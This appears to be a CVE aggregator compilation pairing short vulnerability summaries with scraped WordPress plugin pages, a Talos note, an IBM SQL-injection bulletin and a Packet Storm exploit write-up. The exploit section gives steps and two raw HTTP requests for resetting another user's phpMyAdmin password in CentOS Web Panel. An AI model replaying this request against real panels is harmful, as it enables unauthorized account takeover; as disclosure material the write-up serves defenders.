The cforms2 plugin before 14.6.10 for WordPress has SQL injection.

CVE-2015-9333: cformsII

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to discover phpMyAdmin passwords (of any user in /etc/passwd) via an attacker account.

    Exploit Title       : CWP (CentOS Control Web Panel) Reset other phpMyadmin passwordDate                : 24 Jul 2019Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin BoonwasanarakVendor Homepage     : https://control-webpanel.com/Software Link       : Not available, user panel only available for lastest versionVersion             : 0.9.8.851Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)CVE-Number          : CVE-2019-14246Reference      : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-14246.md1. Login as attacker (low privilege)2. Go to "Mysql Manager"3. Try to change user password of any record4. Intercept the requestPOST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1Host: 192.168.80.148:2083User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430X-Requested-With: XMLHttpRequestContent-Length: 54Connection: closeReferer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_managerCookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2dates=alice_alice||localhost&passuser=UEBzc3cwcmQxMjM05. Modify the request (parameter "dates") and submitPOST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1Host: 192.168.80.148:2083User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430X-Requested-With: XMLHttpRequestContent-Length: 54Connection: closeReferer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_managerCookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2dates=bob||localhost&passuser=UEBzc3cwcmQxMjM0

CVE-2019-14246: CentOS-WebPanel.com Control Web Panel (CWP) 0.9.8.851 phpMyAdmin Password Change ≈ Packet Storm

An exploitable Stack Based Buffer Overflow vulnerability exists in the EnumMetaInfo function of Aspose Aspose.Words library, version 18.11.0.0. A specially crafted doc file can cause a stack-based buffer overflow, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger this vulnerability.

CVE-2019-5041: TALOS-2019-0805 || Cisco Talos Intelligence Group

The wp-slimstat plugin before 4.8.1 for WordPress has XSS.

*   Details
*   Reviews
*   Installation
*   Development

Track returning customers and registered users, monitor Javascript events, detect intrusions, analyze email campaigns. Thousands of WordPress sites are already using it.

**Main features**

*   **Real-Time Access Log**: measure server latency, track page events, keep an eye on your bounce rate and much more.
*   **Shortcodes**: display reports in widgets or directly in posts and pages.
*   **GDPR**: fully compliant with the GDPR European law. You can test your website at cookiebot.com.
*   **Filters**: exclude users from statistics collection based on various criteria, including user roles, common robots, IP subnets, admin pages, country, etc.
*   **Export to Excel**: download your reports as CSV files, generate user heatmaps or get daily emails right in your mailbox (via premium add-ons).
*   **Cache**: compatible with W3 Total Cache, WP SuperCache, CloudFlare and most caching plugins.
*   **Privacy**: hash IP addresses to protect your users’ privacy.
*   **Geolocation**: identify your visitors by city and country, browser type and operating system (courtesy of MaxMind and Browscap).
*   **World Map**: see where your visitors are coming from, even on your mobile device (courtesy of amMap).

**Requirements**

*   WordPress 5.0+
*   PHP 7.4+
*   MySQL 5.0.3+
*   At least 5 MB of free web space (240 MB if you plan on using the external libraries for geolocation and browser detection)
*   At least 10 MB of free DB space
*   At least 32 Mb of free PHP memory for the tracker (peak memory usage)

**Please note**

*   If you decide to uninstall Slimstat Analytics, all the stats will be **PERMANENTLY** deleted from your database. Make sure to setup a database backup (wp\_slim\_\*) to avoid losing your data.

1.  In your WordPress admin, go to Plugins > Add New
2.  Search for Slimstat Analytics
3.  Click on **Install Now** next to Slimstat Analytics and then activate the plugin
4.  Make sure your template calls wp_footer() or the equivalent hook somewhere (possibly just before the </body> tag)

An extensive knowledge base is available on our website.

Thanks for this plugin! I really enjoy using the real-time user data. It also helps to find out about 404 errors/links on the site. You are doing great 🙂

I want a real time stats of active users on various pages of my site. But the real time page simply lists the current users and there is a map showing their location. Also, there are setting for date range??? This page could be configured better. Include setting as to what qualifies a active user (such as entered page within the last 15 minutes). Some information presented is useful. Also, stats regarding performance taxing on server would be good. But as it is, I don't think I will keep this over GA4.

Best in-house stats plugin for wordpress I could find and great support. No more sharing my website data with third-parties, like Google Analytics. Highly recommend it.

The plugin has been updated. It downloads and unpacks the GeoLite2 database from Maxmind for WooCommerce website without a hiccup. Thank you for a great tool, essential for planning inventory and blocking gargoyles.

Demasiado brutal, tengo menos de un minuto usándola y ya la amo.

especially since the author renewed the plugin recently. It's got geolocation and browser useragent working. Wonderful

Read all 807 reviews

“Slimstat Analytics” is open source software. The following people have contributed to this plugin.

Contributors

**4.9.3.2**

*   \[Fix\] The filtering issue

**4.9.3.1**

*   \[Fix\] Query issue in UTF-8 slugs

**4.9.3**

*   \[Update\] New logo and icon for the plugin!
*   \[Fix\] Hardened plugin security and sanitization of user input and escaped output

**4.9.2**

*   \[Fix\] Fixed tweak notice errors while activating the plugin in fresh installation
*   \[Update\] Tested up to WordPress v6.1

**4.9.0.1**

*   \[Fix\] Entries in the Top Referring Domains report were pointing to broken links (thank you, s7ech).
*   \[Fix\] The new Browscap Library requires at least PHP 7.4, up from 7.1. (thank you, Daniel Jaraud).

**4.9**

*   \[New\] Browscap Library is now bundled with the main plugin, only definition files are downloaded dynamically.
*   \[New\] Support MaxMind License Key for GeoLite2 database downloads.
*   \[New\] Speedup Browscap version check when repository site is down.
*   \[New\] Delete plugin settings and stats only if explicitly enabled in settings
*   \[Fix\] Addressed a PHP warning of undefined variable when parsing a query string looking for search term keywords (thank you, inndesign).
*   \[Fix\] Fixed SQL error when Events Manager plugin is installed, ‘Posts and Pages’ is enabled, and no events are existing (thank you, lwangamaman.
*   \[Fix\] Starting with 4.9, PHP 7.4+ is required (thank you, stephanie-mitchell.
*   \[Fix\] Opt-Out cookie does not delete slimstat cookie.

**4.8.8.1**

*   \[Update\] The Privacy Mode option under Slimstat > Settings > Tracker now controls the fingerprint collection mechanism as well. If you have this option enabled to comply with European privacy laws, your visitors’ IP addresses will be masked and they won’t be fingerprinted (thank you, Peter).
*   \[Update\] Improved handling of our local DNS cache to store hostnames when the option to convert IP addresses is enabled in the settings.
*   \[Fix\] Redirects from the canonical URL to its corresponding nice permalink were being affected by a new feature introduce in version 4.8.7 (thank you, Brookjnk).
*   \[Fix\] The new tracker was throwing a Javascript error when handling events attached to DOM elements without a proper hierarchy (thank , you pollensteyn).
*   \[Fix\] Tracking downloads using third-party solutions like Download Attachments was not working as expected (thank you, damianomalorzo).
*   \[Fix\] Inverted stacking order of dots on the map so that the most recent pageviews are always on top, when dots are really close to each other.
*   \[Fix\] A warning message was being returned by the function looking for search keywords in the URL (thank you, Ryan).

**4.8.8**

*   \[New\] Implemented new FingerPrintJs2 library in the tracker. Your visitors are now associated with a unique identifier that does not rely on cookies, IP address or other unreliable information. This will allow Slimstat to produce more accurate results in terms of session lenghts, user patterns and much more.
*   \[New\] Added event handler for ‘beforeunload’, which will allow the tracker to better meausure the time spent by your visitors on each page. This will make our upcoming new charts even more accurate.
*   \[Update\] Improved algorithm that scans referrer URLs for search terms, and introduced a new list of search engines. Please help us improve this list by submitting your missing search engine entries.
*   \[Update\] Added title field to Slimstat widgets (thank you, jaroslawistok).
*   \[Update\] Reverted a change to the Top Web Pages report that was now combining URLs with a trailing slash and ones without one into one result. As James pointed out, this is a less accurate measure and hides the fact that people might be accessing the website in different ways.
*   \[Update\] The event tracker now annotates each event with information about the mouse button that was clicked and other useful data.
*   \[Fix\] The Country shortcode was not working as expected because of a change in how we handle localization files.
*   \[Fix\] Renamed slim\_i18n class to avoid conflict with external libraries.

**4.8.7.3**

*   \[New\] Implemented a simple query cache to minimize the number of requests needed to crunch and display the data in the reports.
*   \[Update\] Extended tracker to also record the ‘fragment’ portion of the URL, if available (this feature is only available in Client Mode).
*   \[Update\] Do not show the resource title in Network View mode.
*   \[Fix\] Some reports were not optimized for our Network Analytics add-on (thank you, Peter).
*   \[Fix\] The notice displayed to share the latest news with our users would not disappear even after clicking the X button to close it (thank you, Anton).
*   \[Fix\] The ‘Top Web Pages’ reports was listing duplicate entries.
*   \[Fix\] A regression bug was affecting the Currently Online report, by showing incorrect information for the IP addresses.
*   \[Fix\] After resetting the Customizer view, all reports were being listed twice (thank you, Anton).
*   \[Fix\] A new feature introduced by our Javascript tracker was not working as expected in IE11 (thank you, 51nullacht).

**4.8.7.2**

*   \[Fix\] The new tracker was having problems recording clicks on SVG elements within a link (thank you, pollensteyn).
*   \[Fix\] The event handler is now capable of tracking events on BUTTONs within FORM elements.
*   \[Fix\] Permalinks containing post query strings were not being recorded as expected.

**4.8.7.1**

*   \[Note\] We are in the process of deprecating the two columns _type_ and _event\_description_ in the events table, and consolidating that information in the _notes_ field. Code will be added to Slimstat in a few released to actually drop these columns from the database. If you are using those two columns in your custom code, please feel free to contact our support team to discuss your options and how to update your code using the information collected by the new tracker.
*   \[Fix\] A warning message was being displayed when enabling the opt-out feature with certain versions of PHP.
*   \[Fix\] PHP warning being displayed when trying to update some of the add-ons’ settings.
*   \[Fix\] The new tracker was recording the number of posts on an archive page even when the single article was being displayed.
*   \[Fix\] License keys for premium add-ons were not being saved as expected, due to a side effect of the new security features we implemented in the Settings.

**4.8.7**

*   \[New\] With this update, we are introducing an _updated tracker_ (both server and client-side): a new simplified codebase that gets rid of a few layers of convoluted functions and algorithms accumulated over the years. We have been working on this update for quite a while, and the recent conflict with another plugin discovered by some users convinced us to make this our top priority. Even though we have tested our new code using a variety of scenarios, you can understand how it would be impossible to cover all the possible environments available out there. Make sure to clear your caches (local, Cloudflare, WP plugins, etc), to allow Slimstat to append the new tracking script to your pages. Also, if you are using Slimstat to track _external_ pages (outside of your WP install), please make sure to update the code you’re using on those pages with the new one you can find in Slimstat > Settings > Tracker > External Pages.
*   \[New\] Increased minimum WordPress requirements to version 4.9, given that we are now using some more modern functions to enqueue the tracker and implement the customizer feature.
*   \[Update\] We tweaked the SQL query to retrieve ‘recent’ results, and added a GROUP BY clause to remove duplicates. This might affect some custom reports you might have created, so please don’t hesitate to contact us if you have any question or experience any issues.
*   \[Update\] The columns to store event type and description are being deprecated, and consolidated into the existing ‘notes’ column. Our function ss_track() will only accept the note parameter moving forward. Please update your custom code accordingly. In a few releases, we are going to drop those columns from the database.
*   \[Update\] Changed wording on Traffic Sources report to explain what kind of search engine result pages are being counted (thank you, Nina).
*   \[Fix\] The button to delete all the records from the database was not working as expected (thank you, Softfully).
*   \[Fix\] When the plugin was network activated on a group of existing blogs, the tables used to store all the records were not initialized as expected, under given circumstances.
*   \[Fix\] A bug was affecting certain shortcodes when PHP 7.2 was enabled (thank you, Peter).
*   \[Fix\] Emptying one of the settings and saving did not produce the desired effect.

CVE-2019-15112: Slimstat Analytics

The weblibrarian plugin before 3.4.8.6 for WordPress has XSS via front-end short codes.

*   Details
*   Reviews
*   Installation
*   Development

This WordPress plugin started as a portable, cross-platform system that  
the Wendell Free Library could use as a transition system from its current  
paper card based circulation system to the system that will eventually  
be rolled out by the regional library system. It has ‘morphed’ to a  
web-based successor to Deepwoods Software’s Home Librarian 3 system.

This plugin implements a simple and basic, web-based, library catalog  
and circulation system. There are short codes that can be added to  
pages of a WordPress site to search and display items in the library  
collection. And there are back-end (admin) pages that implement  
management of the collection, management of patrons (users) of the  
library, as well as implementing the functionality of a circulation  
desk.

The plugin can be installed by uploading the Zip file to the plugin  
installer or unpacking the zip file under the plugins directory.

There are some options that can be set, but these options are not needed  
for basic operation. There are three short codes that can be added to  
pages or posts for front end searching and display of your library  
collection and there are a number of back-end (dashboard) pages for all  
of the management of your library.

Please read the PDF User Manual (also available in  
Italian) for complete documentation on using this plugin. This  
is a fairly non-trivial plugin, and there is not a simple quick-start guide  
for the impatient. The user manual files are 1548805 bytes long for the  
Italian version and 1548666 for the Englist version and MD5 sums are  
available. If you are having trouble opening the PDFs,  
please check the size and the MD5Sum. If the size is right and the MD5Sum is  
right, try another PDF viewer.

Support is handled either with \[Deepwoods Software’s Bugzilla\]\[bugreport\]  
(submit any bugs and feature requests to the Bugzilla) or though the  
\[Deepwoods Software’s Support page\]\[support\] (use this for comments or  
for general questions).

You’ve successfully installed the Web Librarian, but none of the admin  
menus (Patrons, Collection, Circulation Types, Circulation Desk, or  
Circulation Stats) show up. Why is this? This is because you are  
probably logged in as the web site administrator (your user role is  
Administrator). You need to create at least a user with a user role of  
Librarian and then log in as this user. Optionally, you can also  
create users with roles of Senior Aid or Volunteer, who have lesser  
privileges — these latter users make sense if you are a large enough  
library that has additional staff (“Senior Aid”) or uses additional  
workers (“Volunteer”) who man the circulation desk(s). It is important  
to read the subsection titled “User Role Setup” in the “Installation and  
basic setup” section _carefully_ and to be sure you understand it fully.

**Which stylesheet (CSS) selectors can I use to modify the appearance of the front end?**

This is described in the appendix of the user manual.

**I am having a problem with the bulk upload.**

Here are some tips relating to problems with bulk uploading a collection:

If you export a CSV file from Excel (and probably other ‘modern’ spreadsheet  
programs as well), you should check the resulting CSV file with a _plain text_  
editor. Things to look for include extra commas at the ends of lines  
(‘phantom’ or empty columns) and strange characters, partitularly in the  
headings and in barcodes (if you using your own barcodes).

Other issues involving issues with newline characters. Most of the time  
WordPress will be running on a LAMP server (a Linux machine). Linux uses the  
linefeed character (ASCII 10, Ctrl-j) as newline character. MS-Windows uses a  
two character sequence for newlines: carriage return (ASCII 13, Ctrl-m)  
followed by a linefeed (ASCII 10, Ctrl-j). MacOSX uses just a carriage  
return (ASCII 13, Ctrl-m). Web browsers are _supposed_ to normalize uploaded  
plain text files, but sometimes this does not happen. It might be necessary  
to fix things in advance of uploading.

Finally, try your upload in _small_ chunks, at least until you get the process  
worked out. Remember that most WordPress (PHP) installs have a limit on the  
maximum size of uploaded files, so a really large database is going to have be  
uploaded in chunks anyway.

**How do I check an item out?**

In order to check an item out, you need to load a patron record into the  
circulation desk page. You can use the “Find Patron” button to search the  
patrons by name and then select the proper result from the list of results  
in the drop down and then click the “Lookup Patron” to load that patron’s  
record. You can then enter the item’s barcode in the item barcode field and  
click the “Checkout” button. It is possible to pre-load the item barcode  
field before looking up the patron.

**Search does not work – sends me back to my home page**

This is caused by a conflict with permalinks and form handling. Answered in  
the support forum on the WordPress site:

https://wordpress.org/support/topic/search-doesnt-work-7

I’d suggest this solution:

Change your site’s permalink settings: on the dashboard select  
Settings->permalinks, then select something other than the ‘default’.

**I cannot open the user manual, it appears to be corrupt**

Please check the size of the PDF (1548805 for user\_manual\_IT.pdf and 1548666  
for user\_manual.pdf) and also check the MD5 sum to make  
sure you properly downloaded the file. The correct download urls are:

User Manual (English):  
https://plugins.svn.wordpress.org/weblibrarian/assets/user\_manual/user\_manual.pdf

User Manual (Italian):  
https://plugins.svn.wordpress.org/weblibrarian/assets/user\_manual/user\_manual\_IT.pdf

**Something does not work. What should I do?**

Submit a bug at \[Deepwoods Software’s Bugzilla\]\[bugreport\].

**I have another question that is not listed here. What should I do?**

Submit one on Deepwoods Software’s Support page. You can  
also submit a documentation bug at Deepwoods Software’s Bugzilla  
as well.

Dear Robert, Truly value your exertion in making this module. Good to run an online library. We have effectively setup and propelled a free online library for our group. Great work. We created a new theme on your work and its all thanks to your work. Web Librarian Much thanks 🙂

As a non-lending family history society, we wanted a plugin which would enable members to search the library catalogue and display results. We did not require the circulation side of it as we don't lend materials. We also wanted the ability to enter the category and subject so have added those to the database\_code\_php so that the librarian can select from each without having to retype every time. The librarian can export to a CSV file (already provided), and can now search the collection using Title, ISBN, Keyword, Call Number etc and sort on those headings as well. This has the bones of a good program for our needs and I had searched long and hard before downloading this one.

I tried loading this onto a subdomain site with the theme ‘Evolve'. Each time the plugin uploaded and activated, but soon as I added a library user the subdomain site and my main site froze. I had to delete the plugin in order to restore. Maybe this is a good plugin but not for me. I have no option but to look for an alternative.

Read all 12 reviews

“WebLibrarian” is open source software. The following people have contributed to this plugin.

Contributors

*    Robert Heller

**3.5.8.1**

Updated .pot file.

**3.5.8**

Minor bug fixes.

**3.5.7**

Fixed collection sorting.

**3.5.6**

Fixed missing ; in short\_codes.php.

**3.5.5**

Fix CVE-2019-1010034.

**3.5.4**

Add loading of base jQuery, in case the theme does not load it.

**3.5.3**

Perform length check and truncation in WEBLIB\_ItemInCollection::upload\_csv().

**3.5.2**

Removed extra dollar sign in database\_code.php.

**3.5.1**

Small bug — fix small edit error in WEBLIB\_AdminPages constructor.

**3.5**

Changed the localization slug from web-librarian to weblibrarian to conform  
with https://make.wordpress.org/meta/handbook/documentation/translations/

**3.4.8.7**

Fix yet another XSS problem in front end short codes.

**3.4.8.6**

Fix additional XSS problems in front end short codes.

**3.4.8.5**

Fix XSS problem in front end short codes.

**3.4.8.4**

Fix pubdate error in short codes.

**3.4.8.3**

Corrected ordering of fields in long format short code.

**3.4.8.2**

*   Make date display and entry in forms consistent.

**3.4.8.1**

*   Remove USA specific State check (required two letter state).

**3.4.8**

*   Relaxed the State, Zip, and Telephone fields of patrons to allow for non-USA users.

**3.4.7**

*   Fix small error handling code in WEBLIB\_Patrons\_Admin.php.

**3.4.6**

*   Changed to use PHP5 constructors in Widget classes (WP\_Widget).

**3.4.5**

*   Changed split() in includes/WEBLIB\_Patrons\_Admin.php to explode().

**3.4.4**

*   Added Czech language files.

**3.4.3**

*   Added Brazilian Portugese language module.

**3.4.2**

*   Minor bugfix for Patron Short Codes: removed unused functions and removed  
    references to undefined members (leftovers from copying ListTable code from  
    Admin land).

**3.4.1**

*   Added check for patron insertion falure.

**3.4**

*   Added short codes to put patron edit functions on the front side: editing  
    patron contact info along with hold and circs handling. This allows use with  
    plugins like WooCommerce that redirect away from the “normal” WP Admin  
    Dashboard.

**3.3**

*   Secure data export code: convert to use admin-post.php.
*   Secure AWS code: convert to use admin-post.php and admin-ajax.php
*   Move AJAX code to proper WP coding (using admin\_ajax.php).

**3.2.10.14**

*   Add ‘view\_admin\_dashboard’ cap. to Librarian, Senior Aid, and Volunteer, to allow usage with WooCommerce.

**3.2.10.13**

*   Fix minor error (wrong scope for WEBLIB\_Circulation\_Admin::single\_row\_columns()).

**3.2.10.12**

*   Add auto truncation of collection fields to prevent database errors.

**3.2.10.11**

*   Fix minor error (wrong scope for WEBLIB\_Circulation\_Admin::get\_column\_info()).

**3.2.10.10**

*   Fix minor error (unset variable).

**3.2.10.9**

*   Fix errors in cirlist code (fun with changed WP\_List api…).

**3.2.10.8**

*   Moved URL defines to the constructor. And updated tested to version.

**3.2.10.7**

*   Fix incrstring — MySQL uses case folded compares for unique string keys!

**3.2.10.6**

*   Add wildcards to username search in add patron id.

**3.2.10.5**

*   Fix small bug in Add Patron ID page: wrong page id in search form.

**3.2.10.4**

*   Minor stylesheet fix (#overdue => span.overdue).

**3.2.10.3**

*   Minor documentation update.

**3.2.10.1**

*   Handle Excel extra column stupidity.

**3.2.10**

*   Fix problems with generated barcodes during bulk uploads.

**3.2.9.9**

*   Include medium and large image in AWS item loopup and make them available for insertion

**3.2.9.8**

*   Fix bug in autobarcode generator code. (Stupid SQL ‘order by’!).

**3.2.9.7**

*   Updated AWS Locale endpoints.

**3.2.9.6**

*   Fix missing name attribute in short code.

**3.2.9.5**

*   Remove two small short tags.

**3.2.9.4**

*   Comment out ALL debug code (silly IIS).

**3.2.9.3**

*   Fix minor bug in patron admin code (wrong page name).

**3.2.9.2**

*   Workaround for missing localization function (nl\_langinfo()).
*   Fix missing localization function call (missing \_’s).

**3.2.9.1**

*   Fix typo in the readme.txt file.

**3.2.9**

*   Contextual help translated to Italian (completed).

**3.2.8.3**

*   Update when styles are enqueued.
*   Contextual help translated to Italian (in progress).

**3.2.8.2**

*   Updated readme: Fixed Changelog section (too many =’s!).  
    Added link for user manual (in English and Italian).
*   Updated user manual to include style sheet information for front side  
    styling.

**3.2.8.1**

*   Added hook to allow for localized contextual help.
*   Fixed minor localization bug.

**3.2.8**

*   Move user manual to assets.
*   Small fix to options page: allow for blank AWS options.

**3.2.7.7**

*   Front side update: minor short code updates.

**3.2.7.6**

*   Front side update: short codes and front style sheet updates.

**3.2.7.5**

*   Localization updates. Minor database update.

**3.2.7.4**

*   Localization updates, including localized date validation.

**3.2.7.3**

*   Localization updates.

**3.2.7.2**

*   Added missing style definition for weblib-item-table.

**3.2.7.1**

*   Changed default for publication date to 1900-01-01 to deal with possible  
    MySQL/PHP error on activation (out of range default for publication date).

**3.2.7**

*   Fixed up the jQuery UI, smoothed out the rough edges (eg got all of the  
    proper stylesheet and image support). Additional (minor) localization  
    updates.

**3.2.6.1**

*   Way too much fun with resizable iframes and jQuery: put the Amazon search  
    thingy in an iframe and put the iframe into a resizable (via jQuery) div.  
    sort of works, but still a little funky.
*   Fixed various minor typos: broken tags, spelling errors, missing  
    localizations.

**3.2.6**

*   Changed AWS insert buttons to be a small icon instead of “bulky” text buttons
*   Updated localization, added Italian translation.

**3.2.5.3**

*   Add insert / add buttons to Amazon item loopup. (Experimental!)

**3.2.5.2**

*   Remove roles on deactivate.
*   Make title the default on Amazon searches.

**3.2.5.1**

*   Move loading of Localization files to the correct place

**3.2.5**

*   Added missing contextual help page.
*   Fixed silly typo error in the collection bulk delete code.

**3.2.4**

*   Added code to collection and patron delete functions to clear out orphaned  
    holds and checkouts.
*   Added Collection Database Maintenance page, containing a button to clear out  
    orphaned holds and checkouts.

**3.2.3**

*   Updated the support/donation links (added localization).
*   Added an ‘About’ page.

**3.2.2**

*   Added donation buttons and links.
*   Updated localization.

**3.2.1**

*   Minor bug fix with Call Number column.

**3.2**

*   Added Call Number column to collection database.
*   Updated localization.

**3.1**

*   Minor documentation update for the contextual help for the options page.

**3.0**

*   Major code rewrite. All of the WP\_List\_Tables redone properly and  
    separated into separate source files. Adding the per\_page screen options  
    properly.  
    Added bulletproofing to the collection import code: barcodes are now checked  
    and fixed as they are added — no more ‘broken’ databases!

**2.6.3.2**

*   Various security fixes.

**2.6.3.1**

*   Include debugging code.

**2.6.3**

*   Fixed minor bug with telephone number validation when adding patrons.

**2.6.2**

*   Fixed database creation to deal with MS-Windows / MySQL weirdness  
    (no default allowed for BLOB/TEXT — error under MS-Windows, warning  
    under Linux).

**2.6.1**

*   Add localization to the JavaScript code

**2.6**

*   Add localization to the PHP code

**2.3**

*   Fixed a SQL syntax error.
*   Added ‘upload\_files’ capability to Librarian and SeniorAid roles (allows  
    them to upload images for items in the collection).
*   Fixed the scoping of variables in the JavaScript code.

**2.2.2**

*   Added something to the FAQ section.

**2.2.1**

*   Fixed a problem with the search form short code.

**2.2**

*   Fixed a problem with short PHP tags.

**2.1**

*   Updated to include the AssociateTag parameter required by Amazon.

**2.0**

*   Initial public release.

CVE-2017-18539: WebLibrarian

IBM Contract Management 10.1.0 through 10.1.3 and IBM Emptoris Spend Analysis 10.1.0 through 10.1.3 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 164067.

  

**Summary**

SQL Injection affects IBM Emptoris Spend Analysis and IBM Emptoris Contract Management.

**Vulnerability Details**

**CVEID**: CVE-2019-4481  
**DESCRIPTION:** IBM Emptoris Contract Management is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database.  
CVSS Base Score: 7.6  
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/164064   for the current score  
CVSS Environmental Score\*: Undefined  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L)

**CVEID:** CVE-2019-4483  
**DESCRIPTION:** IBM Emptoris Spend Analysis is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database.  
CVSS Base Score: 7.6  
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/164067 for the current score  
CVSS Environmental Score\*: Undefined  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L)

**Affected Products and Versions**

IBM Contract Management 10.1.0 through 10.1.3  
IBM Emptoris Spend Analysis 10.1.0 through 10.1.3

**Remediation/Fixes**

The remediation to this issue is to apply iFix or a fix pack as soon as practical. Please see below for the information on the fixes available.

Product Name

Versions affected

Remediation iFix or fix pack

IBM Emptoris Contract Management

10.1.0.x

10.1.0.31

10.1.1.x

10.1.1.30

10.1.3.x

10.1.3.24

IBM Emptoris Spend Analysis

10.1.0.x

10.1.0.31

10.1.1.x

10.1.1.30

10.1.3.x

10.1.3.24

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

13 August 2019: Original document published

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

Review the IBM security bulletin disclaimer and definitions regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSYQAR","label":"Emptoris Spend Analysis"},"Component":"","Platform":\[\],"Version":"All Versions","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSYQ89","label":"Emptoris Contract Management"},"Component":"","Platform":\[\],"Version":"All Versions","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}}\]

CVE-2019-4483: Security Bulletin: SQL Injection Affects IBM Emptoris Spend Analysis and IBM Emptoris Contract Management (CVE-2019-4481, CVE-2019-4483)

The option-tree plugin before 2.5.4 for WordPress has XSS related to add_query_arg.

CVE-2015-9320: OptionTree

The 404-to-301 plugin before 2.0.3 for WordPress has SQL injection.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

If you care about your website, you should take steps to avoid 404 errors as it affects your SEO badly. 404 ( Page not found ) errors are common and we all hate it, even Search engines do the same! Install this plugin then sit back and relax. It will take care of 404 errors!

**What is 404 to 301?**

_Handling 404 errors in your site should be easy. With this plugin, it finally is._

> **404 to 301 Log Manager – Add-on is now available!**
> 
> *   Instead of instant email alerts, get **hourly, twice daily, daily, twice weekly, weekly** alerts.
> *   Limit the amount of emails sent out based on error logs count.
> *   **PDF file** attachment of error logs will be delivered through the email.
> *   **Automatically clear** old error logs based on time period.
> *   Get email alerts to multiple email recipients.
> 
> Get this add-on now | See Docs

404 to 301 is a simple but amazing plugin which handles all 404 errors for you. It will redirect all 404 errors to any page that you set, using 301 (or any other) status. That means no more 404 errors! Even in Google webmaster tool you are safe!  
You will not see any 404 error reports in your webmaster tool dashboard.

> **404 to 301 – Features**
> 
> *   You can redirect errors to any existing page or custom link (globally).
> *   **You can set custom redirect for each 404 path!**
> *   No more 404 errors in your website. Seriously!
> *   **Translation ready!**
> *   You can optionally monitor/log all errors.
> *   Exclude paths from errors.
> *   You can optionally enable email notification on all 404 errors.
> *   You can choose which redirect method to be used (301,302,307).
> *   Will not irritate your visitors if they land on a non-existing page/url.
> *   Increase your SEO by telling Google that all 404 pages are moved to some other page.
> *   Completely free to use with lifetime updates.
> *   Developer friendly.
> *   Follows best WordPress coding standards.
> *   Of course, available in GitHub
> 
> Installation | Docs | Screenshots

**Bug Reports**

Bug reports for 404 to 301 are always welcome. Report here.

**More information**

*   404 to 301 – Plugin Homepage, containing more details and docs.
*   Follow the developer @Twitter
*   Other WordPress plugins by Joel James for Duck Dev

**404 Errors and Redirect – More Details**

If you are confused with these terms 404,301, redirect etc, refer this page to know more about the redirect and SEO.

**Bug Reports**

Bug reports for 404 to 301 are always welcome. Report here.

**Installing the plugin – Simple**

1.  In your WordPress admin panel, go to _Plugins > New Plugin_, search for **404 to 301** and click “_Install now_“
2.  Alternatively, download the plugin and upload the contents of `404-to-301.zip` to your plugins directory, which usually is `/wp-content/plugins/`.
3.  Activate the plugin
4.  Go to 404 to 301 tab on your admin menus.
5.  Configure the plugin options with available settings.

**Need more help?**

Please take a look at the plugin documentation or open a support request.

**Missing something?**

If you would like to have an additional feature for this plugin, let me know

**What is the use of 404 to 301?**

It will increase your SEO by redirecting all 404 errors using SEO redirects.

**Can I monitor 404 errors?**

Yes. You can. If you enable logs from settings, it will list all the errors.

**How can I clear logs?**

Select ‘clear logs’ from bulk actions and submit. It will delete all log data from your db.

**Can I get email notifications?**

Yes. You can enable email notifications on each 404 errors (optional).

**Can I set custom redirects for each errors?**

Yes. You can set that from error logs table.

**I need more details**

Please take a look at the plugin documentation or open a support request.

![](https://secure.gravatar.com/avatar/246378b8fd892943ec989dc061ca96bf?s=60&d=retro&r=g)

Since installing this plugin several years ago I have not had to worry about deleting, renaming, or moving pages. It works seamlessly in the background.

![](https://secure.gravatar.com/avatar/4eb6e0988cc21fc3d47902c3e68139b8?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/71993e0df65c4077f1d4a63f3963850b?s=60&d=retro&r=g)

